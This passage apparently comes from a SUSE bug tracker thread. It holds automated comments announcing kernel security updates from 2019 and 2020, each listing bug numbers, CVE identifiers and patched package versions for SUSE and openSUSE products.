NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 49 Swamp Workflow Management 2019-11-13 01:23:12 UTC

SUSE-SU-2019:2947-1: An update that solves 10 vulnerabilities and has 117 fixes is now available.

Category: security (important)
Bug References: 1046299,1046303,1046305,1050244,1050536,1050545,1051510,1055186,1061840,1064802,1065600,1066129,1073513,1082635,1083647,1086323,1087092,1089644,1090631,1093205,1096254,1097583,1097584,1097585,1097586,1097587,1097588,1098291,1101674,1109158,1111666,1112178,1113994,1114279,1117665,1119461,1119465,1123034,1123080,1133140,1134303,1135642,1135854,1135873,1135967,1137040,1137799,1137861,1138190,1139073,1140090,1140729,1140845,1140883,1141600,1142635,1142667,1143706,1144338,1144375,1144449,1144903,1145099,1146612,1148410,1149119,1149853,1150452,1150457,1150465,1150875,1151508,1151807,1152033,1152624,1152665,1152685,1152696,1152697,1152788,1152790,1152791,1153112,1153158,1153236,1153263,1153476,1153509,1153607,1153646,1153681,1153713,1153717,1153718,1153719,1153811,1153969,1154108,1154189,1154242,1154268,1154354,1154372,1154521,1154578,1154607,1154608,1154610,1154611,1154651,1154737,1154747,1154848,1154858,1154905,1154956,1155061,1155178,1155179,1155184,1155186,1155671,802154,814594,919448,987367,998153
CVE References: CVE-2018-12207,CVE-2019-10220,CVE-2019-11135,CVE-2019-16232,CVE-2019-16233,CVE-2019-16234,CVE-2019-16995,CVE-2019-17056,CVE-2019-17133,CVE-2019-17666
Sources used:
SUSE Linux Enterprise Workstation Extension 15-SP1 (src):    kernel-default-4.12.14-197.26.1
SUSE Linux Enterprise Module for Open Buildservice Development Tools 15-SP1 (src):    kernel-debug-4.12.14-197.26.1, kernel-default-4.12.14-197.26.1, kernel-docs-4.12.14-197.26.1, kernel-kvmsmall-4.12.14-197.26.1, kernel-obs-qa-4.12.14-197.26.1, kernel-source-4.12.14-197.26.1, kernel-vanilla-4.12.14-197.26.1, kernel-zfcpdump-4.12.14-197.26.1
SUSE Linux Enterprise Module for Live Patching 15-SP1 (src):    kernel-default-4.12.14-197.26.1, kernel-livepatch-SLE15-SP1_Update_7-1-3.5.1
SUSE Linux Enterprise Module for Legacy Software 15-SP1 (src):    kernel-default-4.12.14-197.26.1
SUSE Linux Enterprise Module for Development Tools 15-SP1 (src):    kernel-docs-4.12.14-197.26.1, kernel-obs-build-4.12.14-197.26.1, kernel-source-4.12.14-197.26.1, kernel-syms-4.12.14-197.26.1
SUSE Linux Enterprise Module for Basesystem 15-SP1 (src):    kernel-default-4.12.14-197.26.1, kernel-source-4.12.14-197.26.1, kernel-zfcpdump-4.12.14-197.26.1
SUSE Linux Enterprise High Availability 15-SP1 (src):    kernel-default-4.12.14-197.26.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 50 Swamp Workflow Management 2019-11-13 01:35:22 UTC

SUSE-SU-2019:2950-1: An update that solves 40 vulnerabilities and has 9 fixes is now available.

Category: security (important)
Bug References: 1117665,1123959,1137586,1137865,1137944,1139073,1139751,1142857,1144903,1145477,1145922,1146042,1146163,1146285,1146361,1146378,1146391,1146413,1146425,1146512,1146514,1146516,1146519,1146524,1146526,1146529,1146540,1146543,1146547,1146584,1146612,1147122,1148938,1149376,1149522,1149527,1149555,1150025,1150112,1150452,1150457,1150465,1151347,1151350,1152782,1152788,1153119,1155671,999278
CVE References: CVE-2016-10906,CVE-2017-18509,CVE-2017-18551,CVE-2017-18595,CVE-2018-12207,CVE-2018-20976,CVE-2019-10207,CVE-2019-10220,CVE-2019-11135,CVE-2019-11477,CVE-2019-14814,CVE-2019-14815,CVE-2019-14816,CVE-2019-14821,CVE-2019-14835,CVE-2019-15098,CVE-2019-15118,CVE-2019-15212,CVE-2019-15215,CVE-2019-15216,CVE-2019-15217,CVE-2019-15218,CVE-2019-15219,CVE-2019-15220,CVE-2019-15221,CVE-2019-15290,CVE-2019-15291,CVE-2019-15505,CVE-2019-15807,CVE-2019-15902,CVE-2019-15926,CVE-2019-15927,CVE-2019-16232,CVE-2019-16233,CVE-2019-16234,CVE-2019-16413,CVE-2019-17055,CVE-2019-17056,CVE-2019-9456,CVE-2019-9506
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP1 (src):    kernel-default-3.12.74-60.64.124.1, kernel-source-3.12.74-60.64.124.1, kernel-syms-3.12.74-60.64.124.1, kernel-xen-3.12.74-60.64.124.1, kgraft-patch-SLE12-SP1_Update_37-1-2.3.1
SUSE Linux Enterprise Server 12-SP1-LTSS (src):    kernel-default-3.12.74-60.64.124.1, kernel-source-3.12.74-60.64.124.1, kernel-syms-3.12.74-60.64.124.1, kernel-xen-3.12.74-60.64.124.1, kgraft-patch-SLE12-SP1_Update_37-1-2.3.1
SUSE Linux Enterprise Module for Public Cloud 12 (src):    kernel-ec2-3.12.74-60.64.124.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 51 Swamp Workflow Management 2019-11-13 01:51:21 UTC

SUSE-SU-2019:2951-1: An update that solves 12 vulnerabilities and has 98 fixes is now available.

Category: security (important)
Bug References: 1046299,1046303,1046305,1050244,1050536,1050545,1051510,1055186,1061840,1064802,1065600,1066129,1073513,1082635,1083647,1086323,1087092,1089644,1090631,1093205,1096254,1097583,1097584,1097585,1097586,1097587,1097588,1098291,1101674,1109158,1114279,1117665,1119461,1119465,1123034,1123080,1133140,1134303,1135642,1135854,1135873,1135967,1137040,1137799,1138190,1140090,1140729,1140845,1140883,1141600,1142635,1142667,1143706,1144338,1144375,1144449,1144903,1145099,1146612,1148410,1149119,1150452,1150457,1150465,1150875,1151508,1152624,1152685,1152782,1152788,1152791,1153112,1153158,1153236,1153263,1153476,1153509,1153646,1153681,1153713,1153717,1153718,1153719,1153811,1153969,1154108,1154189,1154354,1154372,1154578,1154607,1154608,1154610,1154611,1154651,1154737,1154747,1154848,1154858,1154905,1154956,1155178,1155179,1155184,1155186,1155671,1155692,1155836,1155982,1156187
CVE References: CVE-2018-12207,CVE-2019-10220,CVE-2019-11135,CVE-2019-16232,CVE-2019-16233,CVE-2019-16234,CVE-2019-16995,CVE-2019-17055,CVE-2019-17056,CVE-2019-17133,CVE-2019-17666,CVE-2019-18805
Sources used:
SUSE Linux Enterprise Module for Public Cloud 15 (src):    kernel-azure-4.12.14-5.44.1, kernel-source-azure-4.12.14-5.44.1, kernel-syms-azure-4.12.14-5.44.1
SUSE Linux Enterprise Module for Open Buildservice Development Tools 15-SP1 (src):    kernel-source-azure-4.12.14-5.44.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 52 Swamp Workflow Management 2019-11-13 08:32:37 UTC

This is an autogenerated message for OBS integration:
This bug (1144903) was mentioned in
https://build.opensuse.org/request/show/748033 15.1 / kernel-source

Comment 54 Swamp Workflow Management 2019-11-13 20:12:41 UTC

SUSE-SU-2019:14218-1: An update that solves 29 vulnerabilities and has 7 fixes is now available.

Category: security (important)
Bug References: 1101061,1113201,1117665,1131107,1143327,1144903,1145477,1145922,1146163,1146285,1146361,1146391,1146524,1146540,1146547,1146678,1147122,1148938,1149376,1149522,1150025,1150112,1150452,1150457,1150465,1150599,1151347,1151350,1152779,1152782,1152786,1152789,1153158,1155671,802154,936875
CVE References: CVE-2017-18509,CVE-2017-18551,CVE-2018-12207,CVE-2018-20976,CVE-2019-10220,CVE-2019-11135,CVE-2019-14821,CVE-2019-14835,CVE-2019-15118,CVE-2019-15212,CVE-2019-15216,CVE-2019-15217,CVE-2019-15219,CVE-2019-15291,CVE-2019-15292,CVE-2019-15505,CVE-2019-15807,CVE-2019-15902,CVE-2019-15927,CVE-2019-16232,CVE-2019-16233,CVE-2019-16234,CVE-2019-16413,CVE-2019-17052,CVE-2019-17053,CVE-2019-17054,CVE-2019-17055,CVE-2019-17133,CVE-2019-9456
Sources used:
SUSE Linux Enterprise Server 11-SP4-LTSS (src):    kernel-bigmem-3.0.101-108.108.1, kernel-default-3.0.101-108.108.1, kernel-ec2-3.0.101-108.108.1, kernel-pae-3.0.101-108.108.1, kernel-ppc64-3.0.101-108.108.1, kernel-source-3.0.101-108.108.1, kernel-syms-3.0.101-108.108.1, kernel-trace-3.0.101-108.108.1, kernel-xen-3.0.101-108.108.1
SUSE Linux Enterprise Server 11-EXTRA (src):    kernel-default-3.0.101-108.108.1, kernel-pae-3.0.101-108.108.1, kernel-ppc64-3.0.101-108.108.1, kernel-trace-3.0.101-108.108.1, kernel-xen-3.0.101-108.108.1
SUSE Linux Enterprise High Availability Extension 11-SP4 (src):    ocfs2-1.6-0.28.11.2
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    kernel-bigmem-3.0.101-108.108.1, kernel-default-3.0.101-108.108.1, kernel-ec2-3.0.101-108.108.1, kernel-pae-3.0.101-108.108.1, kernel-ppc64-3.0.101-108.108.1, kernel-trace-3.0.101-108.108.1, kernel-xen-3.0.101-108.108.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 55 Swamp Workflow Management 2019-11-14 11:20:06 UTC

openSUSE-SU-2019:2503-1: An update that solves 10 vulnerabilities and has 38 fixes is now available.

Category: security (important)
Bug References: 1048942,1051510,1082635,1083647,1090631,1096254,1117665,1119461,1119465,1123034,1135966,1135967,1137040,1138190,1139073,1140090,1143706,1144338,1144903,1146612,1149119,1150457,1150466,1152624,1152685,1152782,1153476,1153509,1153681,1153969,1154124,1154526,1154737,1154848,1154858,1154905,1154956,1155021,1155178,1155179,1155184,1155186,1155671,1155692,1155836,1155982,1156187,1156429
CVE References: CVE-2018-12207,CVE-2019-0154,CVE-2019-0155,CVE-2019-10220,CVE-2019-11135,CVE-2019-16231,CVE-2019-16233,CVE-2019-16995,CVE-2019-17055,CVE-2019-18805
Sources used:
openSUSE Leap 15.0 (src):    kernel-debug-4.12.14-lp150.12.82.1, kernel-default-4.12.14-lp150.12.82.1, kernel-docs-4.12.14-lp150.12.82.1, kernel-kvmsmall-4.12.14-lp150.12.82.1, kernel-obs-build-4.12.14-lp150.12.82.1, kernel-obs-qa-4.12.14-lp150.12.82.1, kernel-source-4.12.14-lp150.12.82.1, kernel-syms-4.12.14-lp150.12.82.1, kernel-vanilla-4.12.14-lp150.12.82.1

Comment 56 Swamp Workflow Management 2019-11-14 14:19:12 UTC

openSUSE-SU-2019:2507-1: An update that solves 8 vulnerabilities and has 29 fixes is now available.

Category: security (important)
Bug References: 1048942,1051510,1082635,1090631,1096254,1111666,1117665,1119461,1119465,1123034,1135966,1135967,1138190,1139073,1140090,1143706,1144903,1149119,1150466,1152665,1152696,1152697,1152782,1153681,1154124,1154526,1154858,1154905,1154956,1155021,1155061,1155671,1155692,1155836,1155982,1156187,1156429
CVE References: CVE-2018-12207,CVE-2019-0154,CVE-2019-0155,CVE-2019-10220,CVE-2019-11135,CVE-2019-16231,CVE-2019-17055,CVE-2019-18805
Sources used:
openSUSE Leap 15.1 (src):    kernel-debug-4.12.14-lp151.28.32.1, kernel-default-4.12.14-lp151.28.32.1, kernel-docs-4.12.14-lp151.28.32.1, kernel-kvmsmall-4.12.14-lp151.28.32.1, kernel-obs-build-4.12.14-lp151.28.32.1, kernel-obs-qa-4.12.14-lp151.28.32.1, kernel-source-4.12.14-lp151.28.32.1, kernel-syms-4.12.14-lp151.28.32.1, kernel-vanilla-4.12.14-lp151.28.32.1

Comment 57 Swamp Workflow Management 2019-11-15 14:14:42 UTC

SUSE-SU-2019:2984-1: An update that solves 49 vulnerabilities and has two fixes is now available.

Category: security (important)
Bug References: 1068032,1084878,1092497,1106913,1117665,1135966,1135967,1137865,1139550,1140671,1141054,1144338,1144903,1145477,1146285,1146361,1146378,1146391,1146413,1146425,1146512,1146514,1146516,1146519,1146584,1147122,1148394,1148938,1149376,1149522,1149527,1149555,1149612,1149849,1150025,1150112,1150223,1150452,1150457,1150465,1150466,1151347,1151350,1152685,1152782,1152788,1153158,1154372,1155671,1155898,1156187
CVE References: CVE-2016-10906,CVE-2017-18509,CVE-2017-18595,CVE-2018-12207,CVE-2018-20976,CVE-2019-0154,CVE-2019-0155,CVE-2019-10220,CVE-2019-11135,CVE-2019-13272,CVE-2019-14814,CVE-2019-14815,CVE-2019-14816,CVE-2019-14821,CVE-2019-14835,CVE-2019-15098,CVE-2019-15211,CVE-2019-15212,CVE-2019-15214,CVE-2019-15215,CVE-2019-15216,CVE-2019-15217,CVE-2019-15218,CVE-2019-15219,CVE-2019-15220,CVE-2019-15221,CVE-2019-15290,CVE-2019-15291,CVE-2019-15505,CVE-2019-15666,CVE-2019-15807,CVE-2019-15902,CVE-2019-15924,CVE-2019-15926,CVE-2019-15927,CVE-2019-16231,CVE-2019-16232,CVE-2019-16233,CVE-2019-16234,CVE-2019-16413,CVE-2019-16995,CVE-2019-17055,CVE-2019-17056,CVE-2019-17133,CVE-2019-17666,CVE-2019-18680,CVE-2019-18805,CVE-2019-9456,CVE-2019-9506
Sources used:
SUSE OpenStack Cloud 7 (src):    kernel-default-4.4.121-92.125.1, kernel-source-4.4.121-92.125.1, kernel-syms-4.4.121-92.125.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    kernel-default-4.4.121-92.125.1, kernel-source-4.4.121-92.125.1, kernel-syms-4.4.121-92.125.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src):    kernel-default-4.4.121-92.125.1, kernel-source-4.4.121-92.125.1, kernel-syms-4.4.121-92.125.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    kernel-default-4.4.121-92.125.1, kernel-source-4.4.121-92.125.1, kernel-syms-4.4.121-92.125.1
SUSE Linux Enterprise High Availability 12-SP2 (src):    kernel-default-4.4.121-92.125.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 64 Swamp Workflow Management 2019-12-06 23:26:57 UTC

SUSE-SU-2019:3200-1: An update that solves 44 vulnerabilities and has 258 fixes is now available.

Category: security (important)
Bug References: 1046299,1046303,1046305,1048942,1050244,1050536,1050545,1051510,1054914,1055117,1055186,1061840,1064802,1065600,1065729,1066129,1071995,1073513,1082555,1082635,1083647,1086323,1087092,1089644,1090631,1091041,1093205,1096254,1097583,1097584,1097585,1097586,1097587,1097588,1098291,1101674,1103990,1103991,1104353,1104427,1104745,1104967,1106434,1108043,1108382,1109158,1109837,1111666,1112178,1112374,1113722,1113994,1114279,1117169,1117665,1118661,1119086,1119113,1119461,1119465,1120902,1122363,1123034,1123080,1123105,1126390,1127155,1127354,1127371,1127988,1131107,1131304,1131489,1133140,1134476,1134983,1135642,1135854,1135873,1135966,1135967,1136261,1137040,1137069,1137223,1137236,1137799,1137861,1137865,1137959,1137982,1138039,1138190,1138539,1139073,1140090,1140155,1140729,1140845,1140883,1141013,1141340,1141543,1141600,1142076,1142635,1142667,1142924,1143706,1144338,1144375,1144449,1144653,1144903,1145099,1145661,1146042,1146612,1146664,1148133,1148410,1148712,1148859,1148868,1149083,1149119,1149224,1149446,1149448,1149555,1149651,1149652,1149713,1149853,1149940,1149959,1149963,1149976,1150025,1150033,1150112,1150305,1150381,1150423,1150457,1150466,1150562,1150727,1150846,1150860,1150861,1150875,1150933,1151021,1151067,1151192,1151225,1151350,1151508,1151548,1151610,1151661,1151662,1151667,1151671,1151680,1151807,1151891,1151900,1151955,1152024,1152025,1152026,1152033,1152161,1152187,1152325,1152457,1152460,1152466,1152525,1152624,1152665,1152685,1152696,1152697,1152782,1152788,1152790,1152791,1152885,1152972,1152974,1152975,1153108,1153112,1153236,1153263,1153476,1153509,1153607,1153628,1153646,1153681,1153713,1153717,1153718,1153719,1153811,1153969,1154043,1154048,1154058,1154108,1154124,1154189,1154242,1154268,1154354,1154355,1154372,1154521,1154526,1154578,1154601,1154607,1154608,1154610,1154611,1154651,1154737,1154747,1154848,1154858,1154905,1154956,1154959,1155021,1155061,1155178,1155179,1155184,1155186,1155671,1155689,1155692,1155836,1155897,1155982,1156187,1156258,1156429,1156466,1156471,1156494,1156609,1156700,1156729,1156882,1156928,1157032,1157038,1157044,1157045,1157046,1157049,1157070,1157115,1157143,1157145,1157158,1157160,1157162,1157173,1157178,1157180,1157182,1157183,1157184,1157191,1157193,1157197,1157298,1157304,1157307,1157324,1157333,1157386,1157424,1157463,1157499,1157678,1157698,1157778,1157908,1158049,1158063,1158064,1158065,1158066,1158067,1158068
CVE References: CVE-2017-18595,CVE-2019-0154,CVE-2019-0155,CVE-2019-10220,CVE-2019-11135,CVE-2019-14821,CVE-2019-14835,CVE-2019-14895,CVE-2019-15030,CVE-2019-15031,CVE-2019-15916,CVE-2019-16231,CVE-2019-16233,CVE-2019-16995,CVE-2019-17055,CVE-2019-17056,CVE-2019-17666,CVE-2019-18660,CVE-2019-18683,CVE-2019-18805,CVE-2019-18809,CVE-2019-19046,CVE-2019-19049,CVE-2019-19052,CVE-2019-19056,CVE-2019-19057,CVE-2019-19058,CVE-2019-19060,CVE-2019-19062,CVE-2019-19063,CVE-2019-19065,CVE-2019-19067,CVE-2019-19068,CVE-2019-19073,CVE-2019-19074,CVE-2019-19075,CVE-2019-19078,CVE-2019-19080,CVE-2019-19081,CVE-2019-19082,CVE-2019-19083,CVE-2019-19227,CVE-2019-9456,CVE-2019-9506
Sources used:
SUSE Linux Enterprise Live Patching 12-SP5 (src):    kernel-default-4.12.14-122.7.1, kgraft-patch-SLE12-SP5_Update_1-1-8.7.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 65 Swamp Workflow Management 2019-12-07 00:03:59 UTC

SUSE-SU-2019:3200-1: An update that solves 44 vulnerabilities and has 258 fixes is now available.

Category: security (important)
Bug References: 1046299,1046303,1046305,1048942,1050244,1050536,1050545,1051510,1054914,1055117,1055186,1061840,1064802,1065600,1065729,1066129,1071995,1073513,1082555,1082635,1083647,1086323,1087092,1089644,1090631,1091041,1093205,1096254,1097583,1097584,1097585,1097586,1097587,1097588,1098291,1101674,1103990,1103991,1104353,1104427,1104745,1104967,1106434,1108043,1108382,1109158,1109837,1111666,1112178,1112374,1113722,1113994,1114279,1117169,1117665,1118661,1119086,1119113,1119461,1119465,1120902,1122363,1123034,1123080,1123105,1126390,1127155,1127354,1127371,1127988,1131107,1131304,1131489,1133140,1134476,1134983,1135642,1135854,1135873,1135966,1135967,1136261,1137040,1137069,1137223,1137236,1137799,1137861,1137865,1137959,1137982,1138039,1138190,1138539,1139073,1140090,1140155,1140729,1140845,1140883,1141013,1141340,1141543,1141600,1142076,1142635,1142667,1142924,1143706,1144338,1144375,1144449,1144653,1144903,1145099,1145661,1146042,1146612,1146664,1148133,1148410,1148712,1148859,1148868,1149083,1149119,1149224,1149446,1149448,1149555,1149651,1149652,1149713,1149853,1149940,1149959,1149963,1149976,1150025,1150033,1150112,1150305,1150381,1150423,1150457,1150466,1150562,1150727,1150846,1150860,1150861,1150875,1150933,1151021,1151067,1151192,1151225,1151350,1151508,1151548,1151610,1151661,1151662,1151667,1151671,1151680,1151807,1151891,1151900,1151955,1152024,1152025,1152026,1152033,1152161,1152187,1152325,1152457,1152460,1152466,1152525,1152624,1152665,1152685,1152696,1152697,1152782,1152788,1152790,1152791,1152885,1152972,1152974,1152975,1153108,1153112,1153236,1153263,1153476,1153509,1153607,1153628,1153646,1153681,1153713,1153717,1153718,1153719,1153811,1153969,1154043,1154048,1154058,1154108,1154124,1154189,1154242,1154268,1154354,1154355,1154372,1154521,1154526,1154578,1154601,1154607,1154608,1154610,1154611,1154651,1154737,1154747,1154848,1154858,1154905,1154956,1154959,1155021,1155061,1155178,1155179,1155184,1155186,1155671,1155689,1155692,1155836,1155897,1155982,1156187,1156258,1156429,1156466,1156471,1156494,1156609,1156700,1156729,1156882,1156928,1157032,1157038,1157044,1157045,1157046,1157049,1157070,1157115,1157143,1157145,1157158,1157160,1157162,1157173,1157178,1157180,1157182,1157183,1157184,1157191,1157193,1157197,1157298,1157304,1157307,1157324,1157333,1157386,1157424,1157463,1157499,1157678,1157698,1157778,1157908,1158049,1158063,1158064,1158065,1158066,1158067,1158068
CVE References: CVE-2017-18595,CVE-2019-0154,CVE-2019-0155,CVE-2019-10220,CVE-2019-11135,CVE-2019-14821,CVE-2019-14835,CVE-2019-14895,CVE-2019-15030,CVE-2019-15031,CVE-2019-15916,CVE-2019-16231,CVE-2019-16233,CVE-2019-16995,CVE-2019-17055,CVE-2019-17056,CVE-2019-17666,CVE-2019-18660,CVE-2019-18683,CVE-2019-18805,CVE-2019-18809,CVE-2019-19046,CVE-2019-19049,CVE-2019-19052,CVE-2019-19056,CVE-2019-19057,CVE-2019-19058,CVE-2019-19060,CVE-2019-19062,CVE-2019-19063,CVE-2019-19065,CVE-2019-19067,CVE-2019-19068,CVE-2019-19073,CVE-2019-19074,CVE-2019-19075,CVE-2019-19078,CVE-2019-19080,CVE-2019-19081,CVE-2019-19082,CVE-2019-19083,CVE-2019-19227,CVE-2019-9456,CVE-2019-9506
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP5 (src):    kernel-default-4.12.14-122.7.1
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    kernel-docs-4.12.14-122.7.1, kernel-obs-build-4.12.14-122.7.1
SUSE Linux Enterprise Server 12-SP5 (src):    kernel-default-4.12.14-122.7.1, kernel-source-4.12.14-122.7.1, kernel-syms-4.12.14-122.7.1
SUSE Linux Enterprise Live Patching 12-SP5 (src):    kernel-default-4.12.14-122.7.1, kgraft-patch-SLE12-SP5_Update_1-1-8.7.1
SUSE Linux Enterprise High Availability 12-SP5 (src):    kernel-default-4.12.14-122.7.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 67 Swamp Workflow Management 2019-12-13 23:24:01 UTC

SUSE-SU-2019:3294-1: An update that solves 16 vulnerabilities and has 124 fixes is now available.

Category: security (important)
Bug References: 1046299,1046303,1046305,1048942,1050244,1050536,1050545,1051510,1055186,1061840,1064802,1065600,1066129,1073513,1082635,1083647,1086323,1087092,1089644,1090631,1091041,1093205,1096254,1097583,1097584,1097585,1097586,1097587,1097588,1098291,1101674,1109158,1114279,1117665,1119461,1119465,1122363,1123034,1123080,1127155,1131107,1133140,1134303,1135642,1135854,1135873,1135966,1135967,1137040,1137799,1137861,1138190,1139073,1140090,1140729,1140845,1140883,1141600,1142635,1142667,1143706,1144338,1144375,1144449,1144903,1145099,1146612,1148410,1149119,1149448,1150452,1150457,1150465,1150466,1150875,1151225,1151508,1151680,1152497,1152505,1152506,1152624,1152685,1152782,1152788,1152791,1153112,1153158,1153236,1153263,1153476,1153509,1153628,1153646,1153681,1153713,1153717,1153718,1153719,1153811,1153969,1154108,1154124,1154189,1154354,1154372,1154526,1154578,1154607,1154608,1154610,1154611,1154651,1154737,1154747,1154848,1154858,1154905,1154956,1154959,1155021,1155178,1155179,1155184,1155186,1155671,1155692,1155812,1155817,1155836,1155945,1155982,1156187,1156429,1156466,1156494,1156609,1156700,1156729,1156882
CVE References: CVE-2018-12207,CVE-2019-0154,CVE-2019-0155,CVE-2019-10220,CVE-2019-11135,CVE-2019-15916,CVE-2019-16231,CVE-2019-16232,CVE-2019-16233,CVE-2019-16234,CVE-2019-16995,CVE-2019-17055,CVE-2019-17056,CVE-2019-17133,CVE-2019-17666,CVE-2019-18805
Sources used:
SUSE Linux Enterprise Real Time Extension 12-SP4 (src):    kernel-rt-4.12.14-8.9.3, kernel-rt_debug-4.12.14-8.9.3, kernel-source-rt-4.12.14-8.9.3, kernel-syms-rt-4.12.14-8.9.3

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 68 Swamp Workflow Management 2019-12-13 23:47:17 UTC

SUSE-SU-2019:3295-1: An update that solves 20 vulnerabilities and has 186 fixes is now available.

Category: security (important)
Bug References: 1046299,1046303,1046305,1048942,1050244,1050536,1050545,1051510,1054914,1055117,1055186,1061840,1064802,1065600,1065729,1066129,1071995,1073513,1082555,1082635,1083647,1086323,1087092,1089644,1090631,1091041,1093205,1096254,1097583,1097584,1097585,1097586,1097587,1097588,1098291,1101674,1104967,1109158,1111666,1112178,1113722,1113994,1114279,1117665,1119086,1119461,1119465,1123034,1123080,1127988,1131107,1131304,1133140,1134303,1135642,1135854,1135873,1135966,1135967,1137040,1137069,1137799,1137861,1137865,1137959,1137982,1138190,1139073,1140090,1140155,1140729,1140845,1140883,1141013,1141600,1142076,1142635,1142667,1143706,1144338,1144375,1144449,1144903,1145099,1146042,1146519,1146540,1146612,1146664,1148133,1148410,1148712,1148868,1149119,1149313,1149446,1149448,1149555,1149651,1149853,1150305,1150381,1150423,1150452,1150457,1150465,1150466,1150846,1150875,1151067,1151192,1151350,1151508,1151610,1151661,1151662,1151667,1151680,1151807,1151891,1151955,1152024,1152025,1152026,1152033,1152161,1152187,1152243,1152325,1152457,1152460,1152466,1152497,1152505,1152506,1152525,1152624,1152665,1152685,1152696,1152697,1152782,1152788,1152790,1152791,1152972,1152974,1152975,1153112,1153158,1153236,1153263,1153476,1153509,1153607,1153646,1153681,1153713,1153717,1153718,1153719,1153811,1153969,1154108,1154124,1154189,1154242,1154268,1154354,1154372,1154521,1154526,1154578,1154601,1154607,1154608,1154610,1154611,1154651,1154737,1154747,1154848,1154858,1154905,1154956,1155021,1155061,1155178,1155179,1155184,1155186,1155671,1155692,1155812,1155817,1155836,1155945,1155982,1156187,1156429,1156466,1156494,1156609,1156700,1156729,1156882
CVE References: CVE-2017-18595,CVE-2018-12207,CVE-2019-0154,CVE-2019-0155,CVE-2019-10220,CVE-2019-11135,CVE-2019-14821,CVE-2019-15291,CVE-2019-15916,CVE-2019-16231,CVE-2019-16232,CVE-2019-16233,CVE-2019-16234,CVE-2019-16995,CVE-2019-17055,CVE-2019-17056,CVE-2019-17133,CVE-2019-17666,CVE-2019-18805,CVE-2019-9506
Sources used:
SUSE Linux Enterprise Module for Realtime 15-SP1 (src):    kernel-rt-4.12.14-14.14.3, kernel-rt_debug-4.12.14-14.14.3, kernel-source-rt-4.12.14-14.14.2, kernel-syms-rt-4.12.14-14.14.2
SUSE Linux Enterprise Module for Open Buildservice Development Tools 15-SP1 (src):    kernel-rt-4.12.14-14.14.3, kernel-rt_debug-4.12.14-14.14.3

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 70 Swamp Workflow Management 2020-01-14 14:29:16 UTC

SUSE-SU-2020:0093-1: An update that solves 80 vulnerabilities and has 310 fixes is now available.

Category: security (important)
Bug References: 1046299,1046303,1046305,1048942,1050244,1050536,1050545,1051510,1055117,1055186,1061840,1064802,1065600,1065729,1066129,1071995,1073513,1078248,1082555,1082635,1083647,1086323,1087092,1089644,1090631,1090888,1091041,1093205,1096254,1097583,1097584,1097585,1097586,1097587,1097588,1098291,1101674,1103989,1103990,1103991,1104353,1104427,1104745,1104967,1106434,1108043,1108382,1109158,1109837,1111666,1112178,1112374,1113722,1113956,1113994,1114279,1115026,1117169,1117665,1118661,1119086,1119113,1119461,1119465,1120853,1120902,1122363,1123034,1123080,1123105,1126206,1126390,1127155,1127354,1127371,1127611,1127988,1129770,1131107,1131304,1131489,1133140,1134476,1134973,1134983,1135642,1135854,1135873,1135966,1135967,1136261,1137040,1137069,1137223,1137236,1137799,1137861,1137865,1137959,1137982,1138039,1138190,1139073,1140090,1140155,1140729,1140845,1140883,1140948,1141013,1141340,1141543,1142076,1142095,1142635,1142667,1142924,1143706,1143959,1144333,1144338,1144375,1144449,1144653,1144903,1145099,1145661,1146042,1146519,1146544,1146612,1146664,1148133,1148410,1148712,1148859,1148868,1149083,1149119,1149224,1149446,1149448,1149555,1149652,1149713,1149853,1149940,1149959,1149963,1149976,1150025,1150033,1150112,1150305,1150381,1150423,1150452,1150457,1150465,1150466,1150562,1150727,1150846,1150860,1150861,1150875,1150933,1151021,1151067,1151192,1151225,1151350,1151508,1151548,1151610,1151661,1151662,1151667,1151671,1151680,1151807,1151891,1151900,1151910,1151955,1152024,1152025,1152026,1152033,1152107,1152161,1152187,1152325,1152446,1152457,1152460,1152466,1152497,1152505,1152506,1152525,1152624,1152631,1152665,1152685,1152696,1152697,1152782,1152788,1152790,1152791,1152885,1152972,1152974,1152975,1153108,1153112,1153158,1153236,1153263,1153476,1153509,1153607,1153628,1153646,1153681,1153713,1153717,1153718,1153719,1153811,1153969,1154043,1154048,1154058,1154108,1154124,1154189,1154242,1154244,1154268,1154354,1154355,1154372,1154521,1154526,1154578,1154601,1154607,1154608,1154610,1154611,1154651,1154737,1154768,1154848,1154858,1154905,1154916,1154956,1154959,1155021,1155061,1155178,1155179,1155184,1155186,1155331,1155334,1155671,1155689,1155692,1155812,1155817,1155836,1155897,1155921,1155945,1156187,1156258,1156259,1156286,1156429,1156462,1156466,1156471,1156494,1156609,1156700,1156729,1156882,1156928,1157032,1157038,1157042,1157044,1157045,1157046,1157049,1157070,1157115,1157143,1157145,1157158,1157160,1157162,1157169,1157171,1157173,1157178,1157180,1157182,1157183,1157184,1157191,1157193,1157197,1157298,1157303,1157304,1157307,1157324,1157333,1157386,1157424,1157463,1157499,1157678,1157698,1157778,1157853,1157895,1157908,1158021,1158049,1158063,1158064,1158065,1158066,1158067,1158068,1158071,1158082,1158094,1158132,1158381,1158394,1158398,1158407,1158410,1158413,1158417,1158427,1158445,1158533,1158637,1158638,1158639,1158640,1158641,1158643,1158644,1158645,1158646,1158647,1158649,1158651,1158652,1158819,1158823,1158824,1158827,1158834,1158893,1158900,1158903,1158904,1158954,1159024